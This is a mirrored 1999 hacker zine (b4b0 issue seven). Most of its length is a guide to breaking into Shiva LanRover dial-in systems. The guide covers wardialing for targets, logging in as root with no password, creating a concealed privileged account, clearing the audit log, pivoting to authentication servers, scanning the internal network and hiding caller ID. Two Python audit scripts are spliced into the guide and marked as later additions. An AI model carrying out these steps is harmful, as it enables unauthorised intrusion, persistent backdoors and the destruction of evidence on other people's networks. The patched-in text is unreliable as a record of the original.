mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Zines/b4b0/b4b0-07.txt
2017-12-10 21:54:57 +00:00


[ x - The Liberation of Vice - x ]
_________ ______ _________ _________
/\ ___ \ /| \ /\ ___ \ /\ ___ \
/ \ \ /\ \ | | |\ \ / \ \ /\ \ / \ \ /\ \
\ \ \__\ \ | | |_\ \__\ \ \__\ \\ \ \ \ \
\ \ < | | \\ \ < \ \ \ \ \
\ \ ___ `\ |/\_____ _\\ \ ___ `\\ \ \ \ \
\ \ \ /\ \ / / \ \ \ \ \ /\ \\ \ \ \ \
\ \ \__\ \\/____ \ \ \ \ \__\ \\ \ \__\ \
\ \________\ \ \____\ \ \________\\ \________\
\ / / \ / / \ / / \ / /
\/________/ \/____/ \/________/ \/________/
s e v e n
the experience of new ideas and obtuse perspective
[ (c) 1999 The B4B0 Party Programme ]
[ Disrupting the classes of school ]
[ teachers around the world. ]
[TABLE OF CONTENTS]
(01). Introduction - [ph1x]
(02). Hacking the Shiva-Lan-Rover - [Hybrid]
(03). Womper Language Interpretor - [chrak]
(04). My Day in Age - [Rhinestone Cowboy]
(05). Coding a Shell From the Ground Up - [ph1x]
(06). The Art of Writing Shell Code - [smiler]
(07). The Telephone System/Network Part 1 - [pabell]
(08). Revolution Against the Catholic Church - [schemerz]
(09). bsaver.c Overview - [cp4kt]
(10). Conclusion - [ph1x]
Additional pieces included in this issue of b4b0 are...
[ bouncer.c ] ----------> intruderx
[ bsaver.c ] -----------> comp4ct and qytpo
[ carp.c ] -------------> comp4ct
[ carriers.txt ] -------> comp4ct
[ encrypt.c ] ----------> tragen
[ fbsd.tgz ] -----------> icesk
[ gh-cgi.c ] -----------> fred
[ misc.zip ] -----------> milcrat
[ w00f.c ] -------------> cossack and smiler
. -- ---b-4-b-0--r-e-v-o-l-u-t-i-o-n-a-r-i-e-z--- -- -
|
| ph1x ----------- -----> the chosen one
: jsb4ch ---- --- -------> the undecided one
. t1p ------- --------> acclaimed b4b0 admin
gr1p ----- -- - -------> he whose accent slays
. j\ ------ -- ---- -----> the freezing wonder
chr4k ----- ------ ----> the one who operates with a blown mind
comp4ct --- ------ ----> he whom claims to be a b4b0 saint
. p4bell ---- ------ ----> the one called the golden child
coss4ck ---------------> the one of proclamation
sm1ler ----------------> he who is emotionally content
. -- ---b-4-b-0--w-r-i-t-e-r-s--a-n-d--o-t-h-e-r--p-e-r-v-e-r-t-s--- -- -
|
| icesk emf zayten
: pG schemerz jnz
Hybrid assem polder
. Qytpo e- rhinestone cowboy
samj
.
--- Official IRC channel -> Efnet / #!b4b0 (not #b4b0)
--- Most Idiotic Site Ever -> http://www.anticode.com
--- Irc Chick of the Month -> MostHated
--- Greets to -> #!animalcrackers, rhino9, samj's mom, duke,
horizon, LJ & Falon, HNN, those who have helped
us and that we forgot about *sorry*, chixy and
miah of the netcis crew (some of us started
there!), and the NRA
--- Interesting Fact -> The now Irc fad of saying "HEH" was invented
in #b4b0. So we must require you to say the
following when using HEH:
<somenick> HEH (c) b4b0 1999
--- P.S. -> We need more supporters who will write things
for us other than inetd backdoors. Submit your
article/code/remarks/ascii submissions@b4b0.org
- -- ---> interesting <--- -- -
-- -- > http://www.babousa.org - baltimore academy for behavioral optometry
-- -- > http://www.babo.com - best gossip in korea!
-- -- > http://www.babo.com.au - babo morganti and partners
-- -- > http://www.babo.net - those wacky germans
-- -- > http://www.babo.org.uk - british association of balloon operators
-- -- > http://www.alvo.com/tvbabo - babo tv
-- -- > http://www.valhallabrewing.com/dboard/babo2000.htm - bay area brew-off
-------------------------------------------------------------------------------
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
-------------------------------------------------------------------------------
Greatest movie of all time, "Gummo":
I walked into the fruit market today, the clerk thought I was some out of
town hick. "Those apples will be 2 dollars a piece." He tells me. This is
where I outsmarted him. I hand him a 5 dollar bill, and just as he's handing
me a dollar change, I say... "keep it, we're even." On the way out, I stepped
on a grape.
******************************************************************************
[INTRODUCTION]
******************************************************************************
We have had several people who have taken charge as editor for this issue,
but have not followed through with their responsibilities. Therefore, me
(ph1x) the unreliable drug addict has been chosen to get all of the
submissions together and put together a nice issue with good quality reading
material. I have miraculously managed to do so, so read to your heart's desire,
and enjoy this issue. HEH!
PS. I apologize for the extreme lateness of this issue, it's just
that jsbach *cough* I mean... various people said they were
going to write articles, and never did. =)
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> Hacking the Shiva-LAN-Rover System <b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
By Hybrid (th0rn@coldmail.com)
April 1999
Contents:
1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP
1. Introduction
Shiva systems are becoming increasingly popular in the LAN networking world.
If like me you have done quite a lot of scanning you would have come across a
login prompt similar to this: [@ Userid:] If you have never seen this before,
take a look at some of the 9x scans at www2.dope.org/9x. In this file I am
going to focus on the security strengths and weaknesses of the ShivaLanRover
networking system, and give a general overview of what can be done with such
systems. The Shiva system is a network security problem in its own right, in
the sense that once you have gained access to one of these platforms, you
have the opportunity to explore the entire network on which the system is
based; in essence, you are on the trusted side of the firewall. If you would
like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it
via the WWW.
To find a Shiva, the first thing you should do is dust off that old wardialer
program, and start scanning local or toll-free prefix assignments, if you
can't do this, you suck, go away. You will know when you have found a Shiva
when you are confronted with the following prompt:
@ Userid:
or if RADIUS authentication is enabled:
Starting Radius Authentification....
@ Userid:
Blah, ignore the RADIUS authentication thing for now, it's just a lame
attempt to make the system look as if it has been secured, in most cases the
sysadmin would have misconfigured the authentication and you will be
surprised as to how easy it is to get in. So you are at the login prompt,
what next? - As in most OS's Shivas have a nice set of default logins, so the
sysadmin's poor setup is your gain. Try this: login: <root> pass: <NO PASS>.
The root login will work 9 times out of 10. The reason that the root account
works a lot is because in some cases the admin is not even aware the account
even exists! Most of the system setup is done via the main terminal, so the
admin doesn't have to login. The root account is not listed in the userfile
database, so most admins overlook it. In some cases the admin would have set
up their own account with something like <admin> <password> but if the admin
has any common sense you will not get in with that. Like most OS's, Shiva
systems have an audit log, so don't sit there trying to brute force anything,
once you are in, you can clear the system log, but more on that later. OK,
you've found a Shiva, you've logged on as <root> <no password>, now what? -
read on.
Once logged in, you will be dropped into the Shiva command line prompt, which
should look something like this:
Shiva LanRover/8E, Patch 4.5.4p6 98/06/09 (Version and type of Shiva)
ShivaLanRover/8E# (The command prompt. Can be configured to say anything)
To get a list of the available commands type <help> or <?> this will reveal a
menu similar to this:
ShivaLanRover/8E# ? <enter>
alert                    Send text alert to all dial-in users
busy-out line <number>   Busy-out serial line modem
clear <keyword>          Reset part of the system
comment                  Enter a comment into the log
configure                Enter a configuration session
connect <port pool>      Connect to a shared serial port
crashdump                Write crashblock to log
disable                  Disable privileges
help                     List of available commands
initialize <keyword>     Reinitialize part of the system
lan-to-lan <keyword>     Manage LAN-to-LAN connections
passwd                   Change password
ping <IP host>           Send ICMP echo to IP host
ppp                      Start a PPP session
quit                     Quit from shell
reboot                   Schedule reboot
show <keyword>           Information commands, type "show ?" for list
slip                     Start a SLIP session
telnet <IP host>         Start a Telnet session
testline                 Test a line
The first thing you should do is check to see who is online, at the # prompt
use the show command to reveal the list of current online users:
ShivaLanRover/8E# show users <enter>
Line User Activity Idle/Limit Up/Limit
1 jsmith PPP 0/ 10 0/ None
2 root shell 0/ 10 0/ None
Total users: 2
So here we see ourselves logged in on line 2, and a PPP user on line 1. Note
that most of the time users are not configured to be allowed remote dialin
PPP access, so the user jsmith is probably at a terminal on the LAN. Now you
can see who is online, i.e. check the admin is not logged in. Now you need to
get a rough idea of the size of the system and its network. At the # prompt
type:
ShivaLanRover/8E# show lines <enter>
Async Lines:
Line State Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs
1 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
2 CHAR 57600/N/ 1/ |ON |ON |on |on |ON | 2| 0| 0
3 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
4 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
5 IDLE 57600/N/ 1/ |OFF|OFF|on |on |OFF| 0| 0| 0
6 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
7 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
8 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
Here we see a list of the modem ports, as you can see it has 8, this is about
average for most Shiva systems. So now we know how many serial lines there
are, we need to get a rough idea as to how big the network itself is, to do
this type:
ShivaLanRover/8E# show arp <enter>
Protocol Address Age Hardware Addr Type Interface
Internet 208.122.87.6 4m x0-x0-B0-2x-Dx-78 ARPA Ethernet:IP
Internet 208.122.87.4 4m AA-0x-x4-00-0C-04 ARPA Ethernet:IP
Internet 208.122.87.5 4m Ax-00-04-0x-xD-x4 ARPA Ethernet:IP
Internet 208.122.86.4 10m AA-x0-04-00-0C-04 ARPA Ethernet:IP
Internet 208.122.86.40 0m AA-00-04-00-x1-04 ARPA Ethernet:IP
Internet 208.122.86.147 4m 00-80-5x-31-F8-Ax ARPA Ethernet:IP
Internet 208.122.86.145 4m 00-80-5x-FE-C9-x8 ARPA Ethernet:IP
Internet 208.122.86.200 0m 00-x0-A3-xF-21-C8 ARPA Ethernet:IP
Internet 208.122.86.51 4m 00-x0-B0-01-36-3x ARPA Ethernet:IP
Showing the arp cache reveals some of the boxes connected to the LAN, as well
as ethernet address, and type of protocol. Now we have established the kind
of system we are on, it's time to do some exploring, which is where I shall
begin this text file.
2. What can Shiva lan rovers do?
Shiva LanRover systems are very big security weaknesses if installed on any
network. The reason for this is that some of the default settings can be
easily overlooked by the admin. A Shiva system can be configured to provide
a wide variety of network services, some of which are listed here:
PPP (point-to-point protocol). This is the key to gaining access to the
network on which the Shiva is based, in most cases the network will have
an internal DNS server, and if you are lucky, the network on which the system
is based will be connected to the internet. Hint hint, PPP, toll-free. But just
using a Shiva for free net access would be boring, which is why I am going to
discuss the other features of Shivas.
Modem Outdial. In a lot of cases the system would have been configured to
allow modem outdialing which can be good for calling BBS's, diverting to
other dialups, scanning, but again, this is lame, just using a Shiva for
modem outdialing is boring, use your imagination. If you manage to get a PPP
connection, and the system is net connected, you could get online, and at the
same time call your favourite BBS. I'll explain how to do all of this later.
Telnet, ping, traceroute etc. These are the command line tools which will
enable you to determine whether the system is connected to the internet or
not. More on this later.
It's time to go into detail about all of the Shiva's functions and commands, I
will concentrate on what you can do with root access, because that is the
only account you are likely to gain access to.
3. The command line
When logged into the Shiva shell, you have the following commands at your
disposal:
alert (Send text alert to all dial-in users) - Self explanatory.
busy-out uart <call-interface> (Busy-out UART port)
clear <keyword> (Reset part of the system)
The clear command is a nice feature of the Shiva system. The first thing you
should do when on a Shiva is make sure you erase all logs of your commands
and login times etc. To do this all you need to do is type <clear log>. This
will erase and reset the audit log, and also any invalid logins to the Shiva.
There are also other clear commands such as <clear arp> etc, but these will
all cause system problems and get you noticed, best leave this alone for the
time being.
comment (Enter a comment into the log)
configure (Enter a configuration session)
Here's the part where you can get the system to do what you want it to do, i.e.
to get a PPP connection you will need to set up another account with shell
and PPP privileges. The root account does not allow PPP connections, so here
is where you will need to do your stuff. To get anywhere with a Shiva you
need to create a new account, using the config command you can create a new
user account with greater privileges than root. Before you make a new account
it is a good idea to see what kind of setup the other accounts have on the
system, you don't want to make an account that will stick out from the other
accounts, so type:
show security <enter> (this gives a list of the security configuration and
the user list.) You should see something like this:
[UserOptions]
PWAttempts=0
ARARoamingDelimiter=@
ExpireDays=30
GraceLogins=6
[Users]
admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052
Here we get a list of the configured users on the system. As you can see the
admin has made him/herself their own account, while other users have accounts
that allow logins via their terminals, but not remotely. In the above example
all the users have been assigned passwords, so it would be a good idea when
you make your own account to have one as well. The idea is to make an account
that will blend in with the others and not look too obvious. The passwords in
the external user list are all 3DES (triple DES) encrypted. The type of user
account set up is determined by the options, such as jsmith=/di/do etc, more
on these functions in a bit. OK, now we need to set up our own account, to do
this we need to enter a configuration session, at the command line prompt
type: ShivaLanRover/8E# config <enter>
You will then drop into the configuration session.
Enter configuration file lines. Edit using:
^X, ^U clear line
^H, DEL delete one character
^W delete one word
^R retype line
Start by entering section header in square brackets []
Finish by entering ^D or ^Z on a new line.
config> (here is where you enter the config commands, to make your own account
do the following)
config> [users]
config> username=/di/do/sh/tp/pw
config> ^D <------ (type control D to finish)
Review configuration changes [y/n]? y
New configuration parameters:
[users]
username=/di/do/sh/tp/pw
Modify the existing configuration [y/n]? y
You may need to reboot for all changed parameters to take effect.
You've just created your own user account which you can use for PPP
connections etc. To begin with your account is un-passworded, so when you log
back in just hit enter for your password, you can later change this. The /sh
part of the user configuration means you can remotely log into the command
shell, /pw means you have the ability to define your own password, if you
wanted to give yourself another root account, you would use the switch /rt.
In combination with the show config command you can also alter other system
configurations via this method, although it is a very good idea not to
alter anything. Now your account has been set up, all you do is re-connect to
the system and login as your username, more on this later.
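Seen from the administrator's side, the userlist format above can be checked mechanically. The following is an added example, not part of the original article or of Shiva's software: it parses a saved "show security" dump and reports entries with no pwd= field and entries carrying the /sh or /rt switches. The sample userlist is constructed with placeholder hashes, and the parser assumes "/" never occurs inside a field value; the built-in root account is not in this list, so it has to be checked separately.

```python
"""Audit the [Users] section of a saved Shiva LanRover 'show security' dump."""

# Switch meanings as stated in the article: /sh = remote command shell,
# /rt = root privileges. /di, /do, /tp and /pw are parsed but not rated,
# because the article does not describe them as privileged.
RISKY_FLAGS = {"sh": "remote command shell", "rt": "root privileges"}

# Constructed sample in the article's format; hashes are placeholders.
SAMPLE = """\
[UserOptions]
PWAttempts=0
ExpireDays=30
[Users]
admin=/di/do/rt/pw/sh/pwd=PLACEHOLDERHASH1/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=PLACEHOLDERHASH2/ml=2/time=897646052
newuser=/di/do/sh/tp/pw
"""


def parse_users(text):
    """Return {username: {"flags": set, "fields": dict}} for the [Users] section."""
    users, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "users" or "=" not in line:
            continue
        name, _, spec = line.partition("=")
        flags, fields = set(), {}
        # Assumption: "/" separates tokens and never appears inside a value.
        for token in spec.split("/"):
            if not token:
                continue
            if "=" in token:
                key, _, value = token.partition("=")
                fields[key] = value
            else:
                flags.add(token)
        users[name.strip()] = {"flags": flags, "fields": fields}
    return users


def audit(text):
    """Return (username, finding) tuples, sorted by username."""
    findings = []
    for name, entry in sorted(parse_users(text).items()):
        if not entry["fields"].get("pwd"):
            findings.append((name, "no pwd= field: no password set"))
        for flag in sorted(entry["flags"] & set(RISKY_FLAGS)):
            findings.append((name, f"/{flag}: {RISKY_FLAGS[flag]}"))
    return findings


if __name__ == "__main__":
    for user, finding in audit(SAMPLE):
        print(f"{user:10s} {finding}")
```

An entry that pairs /sh with a missing pwd= field is the exact shape of the account created in the configuration session above, which makes it the first thing to look for when comparing a dump against a known-good copy.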
connect <PhoneGroup pool> (Connect to a serial port or modem)
This is another one of the good features of Shivas, you can remotely control
a series of modems on the system, and in a lot of cases dialout. If you want
to call a BBS, note you cannot upload using Zmodem or similar protocols,
although you would be able to download, but expect a few CRC checksum errors.
To connect to a modem type: connect all_ports <enter> you will then drop into
one of the modem pools, as follows:
Connecting to Serial2 at 115200 BPS.
Escape character is CTRL-^ (30).
Type the escape character followed by C to get back,
or followed by ? to see other options.
(here basic modem commands are necessary, use the following to dialout)
ATZ (initialise modem)
ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial
will be based upon the system PBX, so sometimes you will have to figure out
the outdialing code, which should be something simple like dialing a 9 before
the number you want to connect to. To disconnect from the outdialing session
type control C, or ^C. This will take you back to the command line. As with
the other system events, outdialing is logged into the audit file, along with
the number you called. It is generally a good idea to clear the audit log
after things like PPP or dialout, again just type clear log <enter>.
cping <IP host> (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privileges)
dmc <keyword> (Information commands, type "dmc ?" for list)
down <slot> <firstmodem> (last Remove modems from CCB pool)
info <slot> <modem> (Print info for specified modem)
mupdate <slot> <firstmodem> (l Update Rockwell modem FW)
state (Print state of a modem)
status (Print status of all modems)
trace (Trace message passing)
up <slot> <firstmodem> (lastmo Add modems to CCB pool)
test_1slot <slot> (Tests DMC card in slot specified)
test_allcards (Tests all DMC cards found in system)
test_golden <golden slot> (Tests all DMC cards against a Golden DMC)
test_loopall <count 0-99> (Tests All DMC's for count)
test_modempair <slot1> (modem1 Tests modems against each other)
test_slotpair <slot1> <slot2> (Tests a DMC card against another)
test_xmitloop <s> <m> <s> <m> (Tests modem pair for count)
help (List of available commands)
history (List of previous commands)
initialize <keyword> (Reinitialize part of the system)
l2f <keyword> (L2F commands)
close <nickname> (Close tunnel to L2F HG)
login (Start L2F session)
tunnels (Show open tunnels)
lan-to-lan <keyword> (Manage LAN-to-LAN connections)
passwd (Change password)
ping <IP host> (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route <protocol> (Modify a protocol routing table)
rlogin <IP host> (Start an rlogin session)
show <keyword> (Information commands, type "show ?" for list)
show+
account <keyword> (Accounting information)
arp (ARP cache)
bridge <keyword> (Bridging information)
buffers (Buffer usage)
configuration (Stored configuration, may specify sections)
The show config command will reveal all the system configuration setups,
including DNS server information, security configurations, IP routing etc.
It will also show the internal IPs of RADIUS authentication and TACACS
servers.
show+
finger (Current user status)
interfaces [name1 [name2 ... ] (Interface information)
ip <keyword> (Internet Protocol information, type "show ip ?" for list)
To get an idea of the routing information, and again how big the network is
type, show ip route. This will bring up a routing table, and again give you
an idea as to where the connected boxes are, it is a good idea to note the IP
prefixes.
show+
lan-to-lan (LAN-to-LAN connections)
license (Licensing information)
lines (Serial line information)
log (Log buffer)
The show log command will display the system audit log in more format. Here
you will be able to see what is going on on the system, i.e. is it primarily
used for PPP, dialout etc. If users use the system for outdialing, you can
even see the numbers that they dial. Here is a cut down example as to what
you would see in a system log file:
Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in
00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D
00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
00:00 4534 Serial4:PPP: IPCP layer up
00:04 4535 Serial4:PPP: CCP layer up
14:09 4536 Serial4:PPP: IPCP layer down
00:00 4537 Serial4:PPP: CCP layer down
00:00 4538 Serial4:PPP: LCP layer down
00:01 4539 Serial4:PPP: CD dropped on connection
00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
00:06 4541 Serial4: Rate 115200bps
00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:01 4543 Serial4: Initialized modem
04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44
18:27 4545 Serial4: New Dial-In session
00:00 4546 Serial4:PPP: LCP layer up
00:00 4547 Serial4: "krad" logged in
00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C
00:00 4549 Dialin:IPX configured net 9823O049
00:00 4550 Serial4:PPP: IPXCP layer up
00:00 4670 Serial4: New Command Shell session
00:03 4671 Serial4: "root" logged in
01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
00:06 4673 Serial4: Rate 115200bps
00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:00 4675 Serial4: Initialized modem
55:11 4676 Could not parse IP SNMP request.
In the system log, you will also see invalid login attempts, error messages,
and general system events. Because the log file logs everything, it is a good
idea to erase your own presence in it.
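The same log is what a defender has to work with, provided a copy is kept off the box. An added example, not from the original article: a pass over an exported "show log" buffer that flags watched accounts logging in on a Command Shell session and reports breaks in the event sequence numbers. The sample lines are taken from the excerpt above; that sequence numbers normally increase by one is inferred only from that excerpt, and the watched-user list is a hypothetical setting.

```python
"""Review an exported Shiva LanRover 'show log' buffer for suspicious events."""
import re

# A record starts with either a full date stamp or an MM:SS offset,
# followed by the event sequence number and the message.
LINE_RE = re.compile(
    r'^(?:\w{3} \d+ \d\d:\d\d:\d\d \w+ \d{4}|\d\d:\d\d)\s+'
    r'(?P<seq>\d+)\s+(?P<rest>.*)$')
PORT_RE = re.compile(r'^(?P<port>Serial\d+):\s*(?P<msg>.*)$')
SESSION_RE = re.compile(r'^New (?P<kind>.+) session$')
LOGIN_RE = re.compile(r'^"(?P<user>[^"]+)" logged in$')

WATCHED_USERS = {"root"}  # hypothetical watch list

# Lines taken from the article's own log excerpt (which is itself cut down).
SAMPLE_LOG = """\
Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in
00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D
18:27 4545 Serial4: New Dial-In session
00:00 4547 Serial4: "krad" logged in
00:00 4670 Serial4: New Command Shell session
00:03 4671 Serial4: "root" logged in
01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
"""


def review(log_text, watched=WATCHED_USERS):
    """Return a list of (kind, sequence_number, detail) alerts."""
    alerts, session_kind, prev_seq = [], {}, None
    for raw in log_text.splitlines():
        record = LINE_RE.match(raw.strip())
        if not record:
            continue
        seq = int(record["seq"])
        if prev_seq is not None:
            if seq <= prev_seq:
                # Numbering went backwards: buffer was reset or exports mixed.
                alerts.append(("sequence-reset", seq, f"after {prev_seq}"))
            elif seq != prev_seq + 1:
                lo, hi = prev_seq + 1, seq - 1
                detail = f"{lo} missing" if lo == hi else f"{lo}-{hi} missing"
                alerts.append(("gap", seq, detail))
        prev_seq = seq

        event = PORT_RE.match(record["rest"])
        if not event:
            continue
        port, msg = event["port"], event["msg"]
        session = SESSION_RE.match(msg)
        if session:
            session_kind[port] = session["kind"]  # remember session type per line
            continue
        login = LOGIN_RE.match(msg)
        if (login and login["user"] in watched
                and session_kind.get(port) == "Command Shell"):
            alerts.append(("privileged-shell-login", seq,
                           f'{login["user"]} on {port}'))
        elif "logged out" in msg:
            session_kind.pop(port, None)
    return alerts


if __name__ == "__main__":
    for alert in review(SAMPLE_LOG):
        print(alert)
```

A gap only says that records are absent from the copy being reviewed; forwarding events to a separate log host as they occur is what makes a later clear of the on-box buffer visible.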
show+
modem <keyword> (Internal modem information, type "show modem ?" for list)
netbeui <keyword> (NetBeui information, type "show netbeui ?" for list)
novell <keyword> (NetWare information, type "show novell ?" for list)
ppp (PPP multilink bundles and links)
processes (Active system processes)
security (Internal userlist)
semaphores (Active system semaphores)
slot <keyword> (Internal serial slot information, type "show slot ?" for list)
upload (Upload information)
users (Current users of system)
version (General system information, also shows DNS info)
virtual-connections (Virtual Connection information)
slip (Start a SLIP session)
telnet <IP host> (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel <IP host> (Start a Tunnel session)
wan [action] <wan interface> (Perform actions on WAN Interface)
4. System security
Shivas can be very weak on security, due to the exposed root account. If the
system is configured properly they can be very secure systems, although this
is usually not the case. There are many security options for the Shiva system
including RADIUS authentication, SecurID, TACACS, and just the standard
secured login. In some cases an admin will use a secondary server to act as
the RADIUS authentication server. In this case, the setup would look something
like this.
[RADIUS Authentification Server]  } The server contains a secured user
          |                         list, which will be used to verify
          |                         login requests. The login is
       [Router]                     determined if the user can be
        |    |                      verified by the server.
        |    |                    } The Shiva sends the login request to RADIUS.
    [Shiva System]                } Starting Radius Authentification... @ Userid:
Sometimes a system will be configured to work with a number of different
Shivas on a network. For example, using the same idea as above, but without
the RADIUS server, a secondary Shiva may be installed to act as the security
server, whereas all other Shiva systems refer to it for user login
verification. This can be a real bitch if you have logged into a system, but
the above setup has been implemented. For example, say you logged in as root,
and you want to set up a PPP account. The first thing you would do is check
to see what kind of setup existing users have by typing <show security>. If
the verification server has been setup, there will be no users in the user
list, instead you have to find the network location of the verification
server, and hope it has an un-passworded root account on it. To find the
verification server, or primary Shiva, just use the show config command. You
can then telnet from the Shiva you are on, to the Shiva displayed in the
config file, you should then get the @ Userid: login screen again, try root
no pass, if this does not work, it is possible to temporarily configure your
own server on the network, but this would mean other users will not be able
to login, so leave this alone. If you do manage to login to the server as
root, you have to setup your user account there, because that is where all
the Shivas on the network refer to in order to verify users, this way the
admin only has to maintain one user configuration file.
5. PPP
Once you have setup a user account with shell and PPP privileges, you can
begin exploring the network on which the Shiva is based. If the network
is net connected you can get free net access as well, but this is quite risky,
especially if the admin notices PPP sessions active at 4am, with destinations
such as irc.ais.net:6667. When you first establish a PPP connection to a
Shiva server, the first thing you should do is map out the network. To do
this just run a network, or port scanner across the domain which the Shiva
is on. As on most networks, you are likely to come across a variety of
different boxes, such as UNIX boxes, SunOS, shared printers, mail servers,
cisco routers, in one case someone I know found an Amiga box@$!. If the
network is net connected, it is a good idea to use your shell for any net
connections, such as IRC. Once you have an external net connection from a
Shiva it is also possible to simultaneously dialout across the PSTN to a BBS
or any other system. To do this, you would have to find the network address
of the Shiva server you are on, then telnet back to it and re-login. Using
the <connect all_ports> command will give you control over the system modems,
then you can dialout as if you were in terminal mode. If the Shiva you are
on is located on a toll-free number, or even local, it is not a good idea to
use it for net access, or stay on it for a long time. If you must use a Shiva
for net access, it is a good idea to use your PSTN routing skills, and not
dialup to the system directly. The mistake people make when it comes to ANI,
or CLID is that they think only 800 numbers have ANI, and residential numbers
have CLID. This is *wrong*, the ANI service can be setup by anyone, it's a
choice, not a standard. If you want to route your call, the best thing to do
is route internationally, so your originating CLID gets stripped at intralata
boundaries on the PSTN. A technique, which I don't wanna give out, involves
trunk and carrier hopping. Well, that's about it for this file, hope you
enjoyed it. If you want more information on the Shiva Lan Rover system, just
check out shiva.com, they will have technical guides in pdf format, you can
also download the shiva software from their ftp site.
Shouts to the following:
[9x] substance phriend siezer vectorx statd
blotter knight network specialK microdot
katkiller xramlrak bosplaya deadsoul and
nino the 9x g1mp.
[b4b0] gr1p t1p. #9x #darkcyde Efnet.
backa xio.
[D4RKCYDE] downtime elf zomba force mortis
angel dohboy brakis alphavax
tonekilla bishopofhell sintax
digitalfokus mistress.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> Womper Language Interpretor, by chrak <b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
This is a neat language interpreter by chrak, that is still in development.
Check out /w0mper, and make sure to read Example.sh to see a set of example
code.
* NOTE * this isn't quite finished and hopefully chrak will come through
with more releases. Thank you.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> My day in Age, by Rhinestone Cowboy <!b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
I had an epiphany the other day. It wasn't the kind of flash of
insight that makes you shave your head, move to the desert, and change
your name to something that sounds like an astronomical phenomenon, but
I do think it's something that other people need to hear. You see, I
am a professional consultant, and with this project, I became a man.
I was tasked with building a firewall for a healthcare facility. This
wasn't very difficult, and, apart from the planning phases and a lot of
mostly useless meetings, it got built in a day or two. All the exceptions
were put in place, and the LAN was protected to a degree to which it
had never been protected before. All was right with the world...
... Until the client got involved. It started with a simple request.
"Could you please open up telnet services in the firewall to this one
particular Solaris box? We have a few outside consultants who need to
get into that box so they can work remotely. In particular, we have a
user from an educational facility who needs remote root access."
I objected, of course, but I was then informed that it was the
opinion of the IS staff, that this was an "acceptable risk." This wasn't
an opinion that could be justified by anyone, especially after they
shelled out countless thousands of dollars on a "network security solution".
It got a little worse, of course. About a week later, I uncovered a
bug in their web front end to their database. Instead of praise, I got
what I should have expected, exchanges like the following:
"Only people who subscribe to this database should have access. Now you
are telling me that ANYONE on the net can get this data for free? What
the hell is that firewall doing?"
"The firewall is doing its job. The problem is that your web app never
asked me for anything like a password. It just gave me access. It
really wasn't complicated at all. A firewall simply cannot fix your buggy
software."
